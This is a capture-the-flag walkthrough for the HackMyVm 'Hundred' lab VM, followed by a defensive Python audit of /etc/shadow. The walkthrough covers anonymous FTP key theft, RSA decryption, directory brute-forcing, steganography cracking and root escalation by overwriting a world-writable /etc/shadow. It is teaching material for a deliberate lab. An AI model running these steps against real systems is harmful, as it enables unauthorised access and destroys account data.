HackMyVm Hundred Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Hundred
Scan open ports.
```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
| -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
| -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
|_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.150
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
|   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
|_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
Log in to FTP anonymously, download all four files and check each one.
id_rsa is a fake key, users.txt is a list of names, and id_rsa.pem looks like a valid RSA private key.
Scanning port 80 only finds index.html. Its source contains a hint, a `key:` entry in the stylesheet, and a comment suggesting there is a hidden directory.
```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  key: h4ckb1tu5.enc;
  width: 50%;
}
</style>
<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>
<!-- l4nr3n, nice dir.-->
```
Download h4ckb1tu5.enc. Search for how to decrypt an .enc file with an RSA private key; the decrypted content is the directory name.
```bash
~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin
~ cat key.bin
/softyhackb4el7dshelldredd
```
Brute-force the directory with common.txt and find another id_rsa.
```bash
~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50 -w /usr/share/dirb/wordlists/common.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/id_rsa               (Status: 200) [Size: 1876]
/index.html           (Status: 200) [Size: 26]
```
Try to log in over SSH with the usernames from users.txt downloaded from FTP; in fact, the real username is hmv. But we still need the passphrase for the key file.
```bash
~ ssh noname@192.168.56.100 -i id_rsa
noname@192.168.56.100's password:
~ ssh hmv@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
```
The web root also serves logo.jpg; let's see if something is hidden in it.
```bash
~ stegseek --crack logo.jpg users.txt
StegSeek version 0.5
Progress: 0.00% (0 bytes)
[i] --> Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt"
[i] Extracting to "logo.jpg.out"
~ cat logo.jpg.out
d4t4s3c#1
```
Now we can log in over SSH as hmv.
```bash
~ ssh hmv@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
hmv@hundred:~$ id
uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
Searching for writable files shows that /etc/shadow is writable.
```bash
hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
...
/var/www/html/softyhackb4el7dshelldredd/id_rsa
/etc/shadow
...
```
Create a password hash for the word "mypass" and overwrite /etc/shadow with a root entry that uses it. Then we can switch to root.
```bash
hmv@hundred:/$ openssl passwd mypass
J9ZxI.ncuCgxs
hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
hmv@hundred:/$ su root
Password:
root@hundred:/# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hundred
root@hundred:/#
```
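A defender-side check added here, not part of the original walkthrough: a small Python audit of /etc/shadow that flags the state this box is left in, a group- or world-writable shadow file, a file reduced to a single root entry with the other accounts gone, and a 13-character DES crypt hash like the one `openssl passwd` printed above. The sample shadow contents and the expected account list are constructed; on a real host you would pass the file's text and `os.stat("/etc/shadow").st_mode`.

```python
import stat

# Constructed sample data, not captured from the box: the shadow file as the
# walkthrough leaves it (one root line, legacy DES crypt hash) and a healthy one.
TAMPERED_SHADOW = "root:J9ZxI.ncuCgxs:18656:0:99999:7:::\n"
HEALTHY_SHADOW = (
    "root:$6$saltsalt$" + "A" * 86 + ":18656:0:99999:7:::\n"
    "daemon:*:18656:0:99999:7:::\n"
    "hmv:$6$othersalt$" + "B" * 86 + ":18656:0:99999:7:::\n"
)

def parse_shadow(text):
    """Split shadow(5) text into 9-field entries; report malformed lines."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 9:
            problems.append(f"line {lineno}: expected 9 fields, got {len(fields)}")
            continue
        entries.append(fields)
    return entries, problems

def hash_scheme(pw):
    """Classify the password field: empty, locked, a $id$ scheme, or legacy DES."""
    if pw == "":
        return "empty"
    if pw[0] in "!*":
        return "locked"
    if pw[0] == "$":
        return pw.split("$")[1]  # "6" sha512crypt, "1" md5crypt, "y" yescrypt
    return "des" if len(pw) == 13 else "unknown"

def audit_shadow(text, mode, expected_users):
    """Return findings for a shadow file's content and its st_mode permission bits."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("shadow is group- or world-writable")
    entries, problems = parse_shadow(text)
    findings.extend(problems)
    missing = expected_users - {e[0] for e in entries}
    if missing:
        findings.append("accounts missing: " + ", ".join(sorted(missing)))
    for user, pw, *_ in entries:
        scheme = hash_scheme(pw)
        if scheme in ("des", "1", "unknown"):
            findings.append(f"{user}: weak or unrecognised hash scheme ({scheme})")
        elif scheme == "empty":
            findings.append(f"{user}: empty password field")
    return findings
```

Debian installs /etc/shadow as mode 0640 owned by root:shadow, so the group bit check above flags only write access, not the normal group read.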